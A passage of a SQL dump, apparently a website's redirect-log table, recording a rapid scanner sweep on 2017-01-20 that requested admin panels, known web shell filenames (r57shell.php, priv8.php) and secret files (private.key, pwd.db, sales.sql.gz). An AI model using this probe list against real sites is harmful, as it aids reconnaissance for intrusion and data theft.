00:00:00',301),(7918,'http://ekvatorprint.com.ua/phppgadmin',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7919,'http://ekvatorprint.com.ua/phppgadmin/',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7920,'http://ekvatorprint.com.ua/phpunit.phar',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7921,'http://ekvatorprint.com.ua/phpsecinfo/',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7922,'http://ekvatorprint.com.ua/phpsysinfo/',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7923,'http://ekvatorprint.com.ua/phpunit.xml.dist',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7924,'http://ekvatorprint.com.ua/phpunit.xml',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7925,'http://ekvatorprint.com.ua/phymyadmin',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7926,'http://ekvatorprint.com.ua/phymyadmin/',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7927,'http://ekvatorprint.com.ua/physican/login.do',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7928,'http://ekvatorprint.com.ua/pi.php',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7929,'http://ekvatorprint.com.ua/pics',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7930,'http://ekvatorprint.com.ua/pi.php5',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7931,'http://ekvatorprint.com.ua/pictures',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7932,'http://ekvatorprint.com.ua/ping',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7933,'http://ekvatorprint.com.ua/pinfo.php',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7934,'http://ekvatorprint.com.ua/pip-log.txt',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7935,'http://ekvatorprint.com.ua/phpMyAdmin-2.11.4/',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7936,'http://ekvatorprint.com.ua/pipermail',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7937,'http://ekvatorprint.com.ua/piwik',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7938,'http://ekvatorprint.com.ua/piwik/',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7939,'http://ekvatorprint.com.ua/plesk-stat',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7940,'http://ekvatorprint.com.ua/pix',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7941,'http://ekvatorprint.com.ua/pixel',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7942,'http://ekvatorprint.com.ua/pl',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7943,'http://ekvatorprint.com.ua/pkginfo',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7944,'http://ekvatorprint.com.ua/pls/dad/null',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7945,'http://ekvatorprint.com.ua/pls',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7946,'http://ekvatorprint.com.ua/plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload.swf',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7947,'http://ekvatorprint.com.ua/plugins.log',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7948,'http://ekvatorprint.com.ua/plugins/tiny_mce',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7949,'http://ekvatorprint.com.ua/plugins/fckeditor',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7950,'http://ekvatorprint.com.ua/plugins/editors/fckeditor',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7951,'http://ekvatorprint.com.ua/plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload_f9.swf',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7952,'http://ekvatorprint.com.ua/plugins/tiny_mce/',NULL,'','',1,0,'2017-01-20 13:29:03','0000-00-00 00:00:00',301),(7953,'http://ekvatorprint.com.ua/plugins/tinymce',NULL,'','',1,0,'2017-01-20 13:29:04','0000-00-00 00:00:00',301),(7954,'http://ekvatorprint.com.ua/plugins/tinymce/',NULL,'','',1,0,'2017-01-20 13:29:04','0000-00-00 00:00:00',301),(7955,'http://ekvatorprint.com.ua/plugins/web.config',NULL,'','',1,0,'2017-01-20 13:29:04','0000-00-00 00:00:00',301),(7956,'http://ekvatorprint.com.ua/plus',NULL,'','',1,0,'2017-01-20 13:29:04','0000-00-00 00:00:00',301),(7957,'http://ekvatorprint.com.ua/pma/scripts/setup.php',NULL,'','',17,0,'2017-01-20 13:29:04','0000-00-00 00:00:00',301),(7958,'http://ekvatorprint.com.ua/pma',NULL,'','',1,0,'2017-01-20 13:29:04','0000-00-00 00:00:00',301),(7959,'http://ekvatorprint.com.ua/pma/index.php',NULL,'','',5,0,'2017-01-20 13:29:04','0000-00-00 00:00:00',301),(7960,'http://ekvatorprint.com.ua/plupload',NULL,'','',1,0,'2017-01-20 13:29:04','0000-00-00 00:00:00',301),(7961,'http://ekvatorprint.com.ua/pma2005/',NULL,'','',1,0,'2017-01-20 13:29:04','0000-00-00 00:00:00',301),(7962,'http://ekvatorprint.com.ua/pma4/',NULL,'','',1,0,'2017-01-20 13:29:04','0000-00-00 00:00:00',301),(7963,'http://ekvatorprint.com.ua/pmadmin',NULL,'','',1,0,'2017-01-20 13:29:04','0000-00-00 00:00:00',301),(7964,'http://ekvatorprint.com.ua/pmadmin/',NULL,'','',1,0,'2017-01-20 13:29:04','0000-00-00 00:00:00',301),(7965,'http://ekvatorprint.com.ua/pn-admin',NULL,'','',1,0,'2017-01-20 13:29:04','0000-00-00 00:00:00',301),(7966,'http://ekvatorprint.com.ua/podcast',NULL,'','',1,0,'2017-01-20 13:29:04','0000-00-00 00:00:00',301),(7967,'http://ekvatorprint.com.ua/pmyadmin',NULL,'','',1,0,'2017-01-20 13:29:04','0000-00-00 00:00:00',301),(7968,'http://ekvatorprint.com.ua/pmyadmin/',NULL,'','',1,0,'2017-01-20 13:29:04','0000-00-00 00:00:00',301),(7969,'http://ekvatorprint.com.ua/podcasts',NULL,'','',1,0,'2017-01-20 13:29:04','0000-00-00 00:00:00',301),(7970,'http://ekvatorprint.com.ua/podcasts_admin',NULL,'','',1,0,'2017-01-20 13:29:04','0000-00-00 00:00:00',301),(7971,'http://ekvatorprint.com.ua/policies',NULL,'','',1,0,'2017-01-20 13:29:04','0000-00-00 00:00:00',301),(7972,'http://ekvatorprint.com.ua/policy',NULL,'','',1,0,'2017-01-20 13:29:04','0000-00-00 00:00:00',301),(7973,'http://ekvatorprint.com.ua/politics',NULL,'','',1,0,'2017-01-20 13:29:04','0000-00-00 00:00:00',301),(7974,'http://ekvatorprint.com.ua/poll',NULL,'','',1,0,'2017-01-20 13:29:04','0000-00-00 00:00:00',301),(7975,'http://ekvatorprint.com.ua/popup.htm',NULL,'','',1,0,'2017-01-20 13:29:04','0000-00-00 00:00:00',301),(7976,'http://ekvatorprint.com.ua/pollbooth.php',NULL,'','',1,0,'2017-01-20 13:29:04','0000-00-00 00:00:00',301),(7977,'http://ekvatorprint.com.ua/pom.xml',NULL,'','',1,0,'2017-01-20 13:29:04','0000-00-00 00:00:00',301),(7978,'http://ekvatorprint.com.ua/pollbooth.',NULL,'','',1,0,'2017-01-20 13:29:04','0000-00-00 00:00:00',301),(7979,'http://ekvatorprint.com.ua/pop_profile.',NULL,'','',1,0,'2017-01-20 13:29:04','0000-00-00 00:00:00',301),(7980,'http://ekvatorprint.com.ua/pop_profile.php',NULL,'','',1,0,'2017-01-20 13:29:04','0000-00-00 00:00:00',301),(7981,'http://ekvatorprint.com.ua/popup_songs.php',NULL,'','',1,0,'2017-01-20 13:29:04','0000-00-00 00:00:00',301),(7982,'http://ekvatorprint.com.ua/popup_songs.',NULL,'','',1,0,'2017-01-20 13:29:04','0000-00-00 00:00:00',301),(7983,'http://ekvatorprint.com.ua/plugins/upload.php',NULL,'','',1,0,'2017-01-20 13:29:05','0000-00-00 00:00:00',301),(7984,'http://ekvatorprint.com.ua/portal2',NULL,'','',1,0,'2017-01-20 13:29:05','0000-00-00 00:00:00',301),(7985,'http://ekvatorprint.com.ua/portalAppAdmin/login.jsp',NULL,'','',1,0,'2017-01-20 13:29:05','0000-00-00 00:00:00',301),(7986,'http://ekvatorprint.com.ua/portal30',NULL,'','',1,0,'2017-01-20 13:29:05','0000-00-00 00:00:00',301),(7987,'http://ekvatorprint.com.ua/portal30_sso',NULL,'','',1,0,'2017-01-20 13:29:05','0000-00-00 00:00:00',301),(7988,'http://ekvatorprint.com.ua/portaladmin',NULL,'','',1,0,'2017-01-20 13:29:05','0000-00-00 00:00:00',301),(7989,'http://ekvatorprint.com.ua/post',NULL,'','',1,0,'2017-01-20 13:29:05','0000-00-00 00:00:00',301),(7990,'http://ekvatorprint.com.ua/post.html',NULL,'','',1,0,'2017-01-20 13:29:05','0000-00-00 00:00:00',301),(7991,'http://ekvatorprint.com.ua/postinfo.html',NULL,'','',1,0,'2017-01-20 13:29:05','0000-00-00 00:00:00',301),(7992,'http://ekvatorprint.com.ua/postfixadmin',NULL,'','',1,0,'2017-01-20 13:29:05','0000-00-00 00:00:00',301),(7993,'http://ekvatorprint.com.ua/posts',NULL,'','',1,0,'2017-01-20 13:29:05','0000-00-00 00:00:00',301),(7994,'http://ekvatorprint.com.ua/pradmin',NULL,'','',1,0,'2017-01-20 13:29:05','0000-00-00 00:00:00',301),(7995,'http://ekvatorprint.com.ua/press',NULL,'','',1,0,'2017-01-20 13:29:05','0000-00-00 00:00:00',301),(7996,'http://ekvatorprint.com.ua/print',NULL,'','',3,0,'2017-01-20 13:29:05','0000-00-00 00:00:00',301),(7997,'http://ekvatorprint.com.ua/printenv.tmp',NULL,'','',1,0,'2017-01-20 13:29:05','0000-00-00 00:00:00',301),(7998,'http://ekvatorprint.com.ua/priv8.php',NULL,'','',1,0,'2017-01-20 13:29:05','0000-00-00 00:00:00',301),(7999,'http://ekvatorprint.com.ua/printenv',NULL,'','',1,0,'2017-01-20 13:29:05','0000-00-00 00:00:00',301),(8000,'http://ekvatorprint.com.ua/printer',NULL,'','',1,0,'2017-01-20 13:29:05','0000-00-00 00:00:00',301),(8001,'http://ekvatorprint.com.ua/privacy',NULL,'','',1,0,'2017-01-20 13:29:05','0000-00-00 00:00:00',301),(8002,'http://ekvatorprint.com.ua/privacy_policy',NULL,'','',1,0,'2017-01-20 13:29:05','0000-00-00 00:00:00',301),(8003,'http://ekvatorprint.com.ua/privacypolicy',NULL,'','',1,0,'2017-01-20 13:29:05','0000-00-00 00:00:00',301),(8004,'http://ekvatorprint.com.ua/private',NULL,'','',1,0,'2017-01-20 13:29:05','0000-00-00 00:00:00',301),(8005,'http://ekvatorprint.com.ua/private.key',NULL,'','',1,0,'2017-01-20 13:29:05','0000-00-00 00:00:00',301),(8006,'http://ekvatorprint.com.ua/private.mdb',NULL,'','',1,0,'2017-01-20 13:29:05','0000-00-00 00:00:00',301),(8007,'http://ekvatorprint.com.ua/private.sqlite',NULL,'','',1,0,'2017-01-20 13:29:05','0000-00-00 00:00:00',301),(8008,'http://ekvatorprint.com.ua/products',NULL,'','',1,0,'2017-01-20 13:29:05','0000-00-00 00:00:00',301),(8009,'http://ekvatorprint.com.ua/product',NULL,'','',1,0,'2017-01-20 13:29:05','0000-00-00 00:00:00',301),(8010,'http://ekvatorprint.com.ua/procmail',NULL,'','',1,0,'2017-01-20 13:29:05','0000-00-00 00:00:00',301),(8011,'http://ekvatorprint.com.ua/profile',NULL,'','',1,0,'2017-01-20 13:29:05','0000-00-00 00:00:00',301),(8012,'http://ekvatorprint.com.ua/profiles',NULL,'','',1,0,'2017-01-20 13:29:05','0000-00-00 00:00:00',301),(8013,'http://ekvatorprint.com.ua/profiles/minimal/minimal.info',NULL,'','',1,0,'2017-01-20 13:29:05','0000-00-00 00:00:00',301),(8014,'http://ekvatorprint.com.ua/profiles/standard/standard.info',NULL,'','',1,0,'2017-01-20 13:29:05','0000-00-00 00:00:00',301),(8015,'http://ekvatorprint.com.ua/profiles/testing/testing.info',NULL,'','',1,0,'2017-01-20 13:29:05','0000-00-00 00:00:00',301),(8016,'http://ekvatorprint.com.ua/portal',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8017,'http://ekvatorprint.com.ua/progra~1',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8018,'http://ekvatorprint.com.ua/programs',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8019,'http://ekvatorprint.com.ua/project.xml',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8020,'http://ekvatorprint.com.ua/projects',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8021,'http://ekvatorprint.com.ua/promo',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8022,'http://ekvatorprint.com.ua/propadmin',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8023,'http://ekvatorprint.com.ua/protected_access/',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8024,'http://ekvatorprint.com.ua/properties',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8025,'http://ekvatorprint.com.ua/proxy',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8026,'http://ekvatorprint.com.ua/prv',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8027,'http://ekvatorprint.com.ua/prv/',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8028,'http://ekvatorprint.com.ua/ps_admin.cgi',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8029,'http://ekvatorprint.com.ua/ptadmin',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8030,'http://ekvatorprint.com.ua/psquare/x.jsp',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8031,'http://ekvatorprint.com.ua/pub',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8032,'http://ekvatorprint.com.ua/public',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8033,'http://ekvatorprint.com.ua/public_html/robots.txt',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8034,'http://ekvatorprint.com.ua/public_html',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8035,'http://ekvatorprint.com.ua/publication_list.xml',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8036,'http://ekvatorprint.com.ua/publisher',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8037,'http://ekvatorprint.com.ua/pubs',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8038,'http://ekvatorprint.com.ua/publications',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8039,'http://ekvatorprint.com.ua/pwd.db',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8040,'http://ekvatorprint.com.ua/pw.txt',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8041,'http://ekvatorprint.com.ua/pws.txt',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8042,'http://ekvatorprint.com.ua/qa/',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8043,'http://ekvatorprint.com.ua/q',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8044,'http://ekvatorprint.com.ua/qmail',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8045,'http://ekvatorprint.com.ua/qdadmin',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8046,'http://ekvatorprint.com.ua/qmailadmin',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8047,'http://ekvatorprint.com.ua/query.log',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8048,'http://ekvatorprint.com.ua/quickadmin',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8049,'http://ekvatorprint.com.ua/qwertypoiu.htw',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8050,'http://ekvatorprint.com.ua/quikstore.cfg',NULL,'','',1,0,'2017-01-20 13:29:06','0000-00-00 00:00:00',301),(8051,'http://ekvatorprint.com.ua/qwadmin',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8052,'http://ekvatorprint.com.ua/qwertypoiu.printer',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8053,'http://ekvatorprint.com.ua/r.php',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8054,'http://ekvatorprint.com.ua/r',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8055,'http://ekvatorprint.com.ua/r00t.php',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8056,'http://ekvatorprint.com.ua/r57.php',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8057,'http://ekvatorprint.com.ua/propel.ini',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8058,'http://ekvatorprint.com.ua/r99.php',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8059,'http://ekvatorprint.com.ua/r57shell.php',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8060,'http://ekvatorprint.com.ua/radmin',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8061,'http://ekvatorprint.com.ua/radio',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8062,'http://ekvatorprint.com.ua/r58.php',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8063,'http://ekvatorprint.com.ua/r57eng.php',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8064,'http://ekvatorprint.com.ua/rap_admin',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8065,'http://ekvatorprint.com.ua/rating_over.',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8066,'http://ekvatorprint.com.ua/rcjakar/admin/login.php',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8067,'http://ekvatorprint.com.ua/rcjakar/admin/login.',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8068,'http://ekvatorprint.com.ua/rd.php',NULL,'','',2,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8069,'http://ekvatorprint.com.ua/rd.',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8070,'http://ekvatorprint.com.ua/readme',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8071,'http://ekvatorprint.com.ua/read.me',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8072,'http://ekvatorprint.com.ua/readme.html',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8073,'http://ekvatorprint.com.ua/readme.md',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8074,'http://ekvatorprint.com.ua/recaptcha',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8075,'http://ekvatorprint.com.ua/receiver.php',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8076,'http://ekvatorprint.com.ua/receiver.',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8077,'http://ekvatorprint.com.ua/recover',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8078,'http://ekvatorprint.com.ua/redadmin',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8079,'http://ekvatorprint.com.ua/register.php',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8080,'http://ekvatorprint.com.ua/redirect',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8081,'http://ekvatorprint.com.ua/recherche.html',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8082,'http://ekvatorprint.com.ua/regadmin',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8083,'http://ekvatorprint.com.ua/recentservers.xml',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8084,'http://ekvatorprint.com.ua/registration',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8085,'http://ekvatorprint.com.ua/release',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8086,'http://ekvatorprint.com.ua/register',NULL,'','',1,0,'2017-01-20 13:29:07','0000-00-00 00:00:00',301),(8087,'http://ekvatorprint.com.ua/releases',NULL,'','',1,0,'2017-01-20 13:29:08','0000-00-00 00:00:00',301),(8088,'http://ekvatorprint.com.ua/remote-entry/',NULL,'','',1,0,'2017-01-20 13:29:08','0000-00-00 00:00:00',301),(8089,'http://ekvatorprint.com.ua/remote_adm/',NULL,'','',1,0,'2017-01-20 13:29:08','0000-00-00 00:00:00',301),(8090,'http://ekvatorprint.com.ua/rentalsadmin',NULL,'','',1,0,'2017-01-20 13:29:08','0000-00-00 00:00:00',301),(8091,'http://ekvatorprint.com.ua/reply',NULL,'','',1,0,'2017-01-20 13:29:08','0000-00-00 00:00:00',301),(8092,'http://ekvatorprint.com.ua/removeNodeListener',NULL,'','',1,0,'2017-01-20 13:29:08','0000-00-00 00:00:00',301),(8093,'http://ekvatorprint.com.ua/reorder.',NULL,'','',1,0,'2017-01-20 13:29:08','0000-00-00 00:00:00',301),(8094,'http://ekvatorprint.com.ua/reports',NULL,'','',1,0,'2017-01-20 13:29:08','0000-00-00 00:00:00',301),(8095,'http://ekvatorprint.com.ua/reorder.php',NULL,'','',1,0,'2017-01-20 13:29:08','0000-00-00 00:00:00',301),(8096,'http://ekvatorprint.com.ua/report',NULL,'','',1,0,'2017-01-20 13:29:08','0000-00-00 00:00:00',301),(8097,'http://ekvatorprint.com.ua/reports/Webalizer/',NULL,'','',1,0,'2017-01-20 13:29:08','0000-00-00 00:00:00',301),(8098,'http://ekvatorprint.com.ua/request.log',NULL,'','',1,0,'2017-01-20 13:29:08','0000-00-00 00:00:00',301),(8099,'http://ekvatorprint.com.ua/research',NULL,'','',1,0,'2017-01-20 13:29:08','0000-00-00 00:00:00',301),(8100,'http://ekvatorprint.com.ua/resources.xml',NULL,'','',1,0,'2017-01-20 13:29:08','0000-00-00 00:00:00',301),(8101,'http://ekvatorprint.com.ua/resources/fckeditor',NULL,'','',1,0,'2017-01-20 13:29:08','0000-00-00 00:00:00',301),(8102,'http://ekvatorprint.com.ua/reset.html',NULL,'','',1,0,'2017-01-20 13:29:08','0000-00-00 00:00:00',301),(8103,'http://ekvatorprint.com.ua/reset',NULL,'','',1,0,'2017-01-20 13:29:08','0000-00-00 00:00:00',301),(8104,'http://ekvatorprint.com.ua/restricted',NULL,'','',1,0,'2017-01-20 13:29:08','0000-00-00 00:00:00',301),(8105,'http://ekvatorprint.com.ua/resources',NULL,'','',1,0,'2017-01-20 13:29:08','0000-00-00 00:00:00',301),(8106,'http://ekvatorprint.com.ua/restore.php',NULL,'','',1,0,'2017-01-20 13:29:08','0000-00-00 00:00:00',301),(8107,'http://ekvatorprint.com.ua/reseller',NULL,'','',1,0,'2017-01-20 13:29:08','0000-00-00 00:00:00',301),(8108,'http://ekvatorprint.com.ua/restricted_access/',NULL,'','',1,0,'2017-01-20 13:29:08','0000-00-00 00:00:00',301),(8109,'http://ekvatorprint.com.ua/reviewhelpful.php',NULL,'','',1,0,'2017-01-20 13:29:08','0000-00-00 00:00:00',301),(8110,'http://ekvatorprint.com.ua/reviewhelpful.',NULL,'','',1,0,'2017-01-20 13:29:08','0000-00-00 00:00:00',301),(8111,'http://ekvatorprint.com.ua/result.',NULL,'','',1,0,'2017-01-20 13:29:08','0000-00-00 00:00:00',301),(8112,'http://ekvatorprint.com.ua/result.php',NULL,'','',1,0,'2017-01-20 13:29:08','0000-00-00 00:00:00',301),(8113,'http://ekvatorprint.com.ua/results',NULL,'','',1,0,'2017-01-20 13:29:08','0000-00-00 00:00:00',301),(8114,'http://ekvatorprint.com.ua/review',NULL,'','',1,0,'2017-01-20 13:29:09','0000-00-00 00:00:00',301),(8115,'http://ekvatorprint.com.ua/revision.inc',NULL,'','',1,0,'2017-01-20 13:29:09','0000-00-00 00:00:00',301),(8116,'http://ekvatorprint.com.ua/reviews',NULL,'','',1,0,'2017-01-20 13:29:09','0000-00-00 00:00:00',301),(8117,'http://ekvatorprint.com.ua/revision.txt',NULL,'','',1,0,'2017-01-20 13:29:09','0000-00-00 00:00:00',301),(8118,'http://ekvatorprint.com.ua/rmsadmin',NULL,'','',1,0,'2017-01-20 13:29:09','0000-00-00 00:00:00',301),(8119,'http://ekvatorprint.com.ua/rootadmin',NULL,'','',1,0,'2017-01-20 13:29:09','0000-00-00 00:00:00',301),(8120,'http://ekvatorprint.com.ua/rpc.php',NULL,'','',1,0,'2017-01-20 13:29:09','0000-00-00 00:00:00',301),(8121,'http://ekvatorprint.com.ua/root',NULL,'','',1,0,'2017-01-20 13:29:09','0000-00-00 00:00:00',301),(8122,'http://ekvatorprint.com.ua/rubrique.',NULL,'','',1,0,'2017-01-20 13:29:09','0000-00-00 00:00:00',301),(8123,'http://ekvatorprint.com.ua/runtime_messages.jsp',NULL,'','',1,0,'2017-01-20 13:29:09','0000-00-00 00:00:00',301),(8124,'http://ekvatorprint.com.ua/rpc.',NULL,'','',1,0,'2017-01-20 13:29:09','0000-00-00 00:00:00',301),(8125,'http://ekvatorprint.com.ua/rst.php',NULL,'','',1,0,'2017-01-20 13:29:09','0000-00-00 00:00:00',301),(8126,'http://ekvatorprint.com.ua/rubrique.php',NULL,'','',1,0,'2017-01-20 13:29:09','0000-00-00 00:00:00',301),(8127,'http://ekvatorprint.com.ua/sYm.php',NULL,'','',1,0,'2017-01-20 13:29:09','0000-00-00 00:00:00',301),(8128,'http://ekvatorprint.com.ua/rss',NULL,'','',1,0,'2017-01-20 13:29:09','0000-00-00 00:00:00',301),(8129,'http://ekvatorprint.com.ua/rpc_admin',NULL,'','',1,0,'2017-01-20 13:29:09','0000-00-00 00:00:00',301),(8130,'http://ekvatorprint.com.ua/s2dshopadmin.php',NULL,'','',1,0,'2017-01-20 13:29:09','0000-00-00 00:00:00',301),(8131,'http://ekvatorprint.com.ua/s2dshopadmin.',NULL,'','',1,0,'2017-01-20 13:29:09','0000-00-00 00:00:00',301),(8132,'http://ekvatorprint.com.ua/s',NULL,'','',1,0,'2017-01-20 13:29:09','0000-00-00 00:00:00',301),(8133,'http://ekvatorprint.com.ua/sa.php',NULL,'','',1,0,'2017-01-20 13:29:09','0000-00-00 00:00:00',301),(8134,'http://ekvatorprint.com.ua/sa2.php',NULL,'','',1,0,'2017-01-20 13:29:09','0000-00-00 00:00:00',301),(8135,'http://ekvatorprint.com.ua/sadmin',NULL,'','',1,0,'2017-01-20 13:29:10','0000-00-00 00:00:00',301),(8136,'http://ekvatorprint.com.ua/sales-admin',NULL,'','',1,0,'2017-01-20 13:29:10','0000-00-00 00:00:00',301),(8137,'http://ekvatorprint.com.ua/sales.csv',NULL,'','',1,0,'2017-01-20 13:29:10','0000-00-00 00:00:00',301),(8138,'http://ekvatorprint.com.ua/sales.sql',NULL,'','',1,0,'2017-01-20 13:29:10','0000-00-00 00:00:00',301),(8139,'http://ekvatorprint.com.ua/sales.log',NULL,'','',1,0,'2017-01-20 13:29:10','0000-00-00 00:00:00',301),(8140,'http://ekvatorprint.com.ua/sales.sql.gz',NULL,'','',1,0,'2017-01-20 13:29:10','0000-00-00 00:00:00',301),(8141,'http://ekvatorprint.com.ua/sales.txt',NULL,'','',1,0,'2017-01-20 13:29:10','0000-00-00 00:00:00',301),(8142,'http://ekvatorprint.com.ua/salesadmin',NULL,'','',1,0,'2017-01-20 13:29:10','0000-00-00 00:00:00',301),(8143,'http://ekvatorprint.com.ua/sales.xls',NULL,'','',1,0,'2017-01-20 13:29:10','0000-00-00 